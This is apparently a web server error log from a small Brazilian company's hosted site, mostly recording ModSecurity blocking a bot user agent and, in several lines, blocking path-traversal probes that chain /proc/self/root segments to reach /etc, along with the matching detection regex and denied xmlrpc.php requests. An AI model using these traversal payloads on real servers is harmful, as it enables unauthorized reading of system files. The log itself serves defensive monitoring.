[Tue Mar 17 07:03:19.459184 2026] [:error] [pid 2473:tid 140411540502272] [client 74.7.228.16:34304] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkm56BJNF7axNlVR0Xt5AAAABg"]
[Tue Mar 17 07:03:33.643002 2026] [:error] [pid 2304:tid 140411599251200] [client 74.7.244.31:47456] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkm9ch3JZxwdBQwPYHlnAAAAJE"]
[Tue Mar 17 07:08:46.880753 2026] [:error] [pid 4712:tid 140411632822016] [client 74.7.228.16:50178] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkoLnQLOys_ArAUsGMERQAAAc0"]
[Tue Mar 17 07:08:57.295201 2026] [:error] [pid 4740:tid 140411641214720] [client 74.7.244.31:56054] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkoOQfYLcKp6Sb5AeIqMAAAAEw"]
[Tue Mar 17 07:14:02.962610 2026] [:error] [pid 3788:tid 140411565680384] [client 74.7.244.31:54000] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkpahACmvdph3vou-IDJwAAAVU"]
[Tue Mar 17 07:15:43.950461 2026] [:error] [pid 5398:tid 140411741927168] [client 74.7.228.16:43202] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkpzwRES9pL8P-grjlaaAAAAgA"]
[Tue Mar 17 07:19:25.536770 2026] [:error] [pid 2325:tid 140411725141760] [client 74.7.244.31:57776] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkqre82sZHvlq4xgHq0rgAAAoI"]
[Tue Mar 17 07:21:21.557258 2026] [:error] [pid 2325:tid 140411616036608] [client 74.7.228.16:33834] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkrIe82sZHvlq4xgHq04wAAAo8"]
[Tue Mar 17 07:24:31.823058 2026] [:error] [pid 6002:tid 140411599251200] [client 74.7.244.31:43614] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkr3_AKZeKGvQeoFhk_OAAAAtE"]
[Tue Mar 17 07:26:21.778582 2026] [:error] [pid 5398:tid 140411716749056] [client 74.7.228.16:35732] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abksTQRES9pL8P-grjla6AAAAgM"]
[Tue Mar 17 07:29:57.374819 2026] [:error] [pid 2305:tid 140411599251200] [client 74.7.244.31:40466] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abktJQQohV2v-7oj5HHt1QAAAZE"]
[Tue Mar 17 07:31:43.870506 2026] [:error] [pid 6002:tid 140411683178240] [client 74.7.228.16:39776] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abktj_AKZeKGvQeoFhk_ZwAAAsc"]
[Tue Mar 17 07:36:50.051377 2026] [:error] [pid 7437:tid 140411725141760] [client 74.7.228.16:36540] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkuwgeiSKl8TjouI-b25QAAA8I"]
[Tue Mar 17 07:40:27.782882 2026] [:error] [pid 7437:tid 140411741927168] [client 74.7.244.31:56706] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkvmweiSKl8TjouI-b3IAAAA8A"]
[Tue Mar 17 07:46:46.094928 2026] [:error] [pid 2305:tid 140411565680384] [client 74.7.244.31:37004] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkxFgQohV2v-7oj5HHu7AAAAZU"]
[Tue Mar 17 07:47:11.946788 2026] [:error] [pid 11293:tid 140411683178240] [client 74.7.228.16:40732] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkxL9CmCSWTlPouqoq_sgAAAMc"]
[Tue Mar 17 07:52:37.542605 2026] [:error] [pid 2473:tid 140411565680384] [client 74.7.228.16:56610] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkydaBJNF7axNlVR0XyFAAAABU"]
[Tue Mar 17 07:57:29.384666 2026] [:error] [pid 2325:tid 140411616036608] [client 74.7.244.31:53608] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abkzme82sZHvlq4xgHq3kwAAAo8"]
[Tue Mar 17 08:02:32.733211 2026] [:error] [pid 2473:tid 140411599251200] [client 74.7.243.203:55026] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk0yKBJNF7axNlVR0XyvgAAABE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:02:34.074762 2026] [:error] [pid 2325:tid 140411599251200] [client 74.7.244.31:58452] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abk0yu82sZHvlq4xgHq4JAAAApE"]
[Tue Mar 17 08:02:55.984029 2026] [:error] [pid 4712:tid 140411599251200] [client 74.7.228.16:60278] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abk033QLOys_ArAUsGMHbwAAAdE"]
[Tue Mar 17 08:03:58.274918 2026] [:error] [pid 6002:tid 140411666392832] [client 74.7.241.46:56896] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk1HvAKZeKGvQeoFhlBRwAAAsk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:04:26.319190 2026] [:error] [pid 7437:tid 140411733534464] [client 74.7.243.203:52386] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk1OgeiSKl8TjouI-b4zAAAA8E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:05:18.811675 2026] [:error] [pid 7000:tid 140411708356352] [client 74.7.243.203:57032] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk1bhePVOt35XCGZP8jywAAA4Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:07:30.467026 2026] [:error] [pid 7000:tid 140411708356352] [client 74.7.241.46:58974] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk18hePVOt35XCGZP8j-AAAA4Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:07:50.907015 2026] [:error] [pid 2473:tid 140411599251200] [client 74.7.244.31:53618] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abk2BqBJNF7axNlVR0XzewAAABE"]
[Tue Mar 17 08:08:12.566984 2026] [:error] [pid 2305:tid 140411557287680] [client 74.7.228.16:54344] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abk2HAQohV2v-7oj5HHxGAAAAZY"]
[Tue Mar 17 08:08:29.431052 2026] [:error] [pid 4712:tid 140411708356352] [client 74.7.243.203:35446] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk2LXQLOys_ArAUsGMIGAAAAcQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:09:08.363095 2026] [:error] [pid 11293:tid 140411632822016] [client 74.7.243.203:46116] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk2VNCmCSWTlPouqorB1wAAAM0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:10:03.141086 2026] [:error] [pid 2305:tid 140411666392832] [client 74.7.241.46:51182] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk2iwQohV2v-7oj5HHxTAAAAYk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:12:36.013778 2026] [:error] [pid 11469:tid 140411582465792] [client 74.7.241.46:38860] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk3JJDEJR9VXonE_-1EJgAAARM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:12:40.574883 2026] [:error] [pid 5398:tid 140411616036608] [client 74.7.243.203:35116] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk3KARES9pL8P-grjlfRQAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:13:01.219649 2026] [:error] [pid 4712:tid 140411590858496] [client 74.7.243.203:46212] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk3PXQLOys_ArAUsGMIogAAAdI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:13:02.917833 2026] [:error] [pid 2325:tid 140411632822016] [client 74.7.244.31:48992] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abk3Pu82sZHvlq4xgHq5qgAAAo0"]
[Tue Mar 17 08:13:12.841160 2026] [:error] [pid 2305:tid 140411607643904] [client 74.7.228.16:35330] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abk3SAQohV2v-7oj5HHxpQAAAZA"]
[Tue Mar 17 08:14:49.256071 2026] [:error] [pid 662:tid 140411691570944] [client 74.7.241.46:58168] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk3qa60egQjobaJUYgG4gAAAIY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:15:17.049434 2026] [access_compat:error] [pid 6002:tid 140411590858496] [client 45.141.128.193:38611] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Tue Mar 17 08:15:18.286389 2026] [access_compat:error] [pid 11469:tid 140411733534464] [client 45.141.128.193:61583] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Tue Mar 17 08:15:20.072112 2026] [access_compat:error] [pid 6002:tid 140411607643904] [client 45.141.128.193:13187] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Tue Mar 17 08:15:35.398100 2026] [access_compat:error] [pid 662:tid 140411616036608] [client 172.83.254.207:28455] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Tue Mar 17 08:15:57.343265 2026] [access_compat:error] [pid 662:tid 140411674785536] [client 185.77.220.68:53769] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Tue Mar 17 08:15:59.484977 2026] [access_compat:error] [pid 2473:tid 140411708356352] [client 185.77.220.68:58745] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
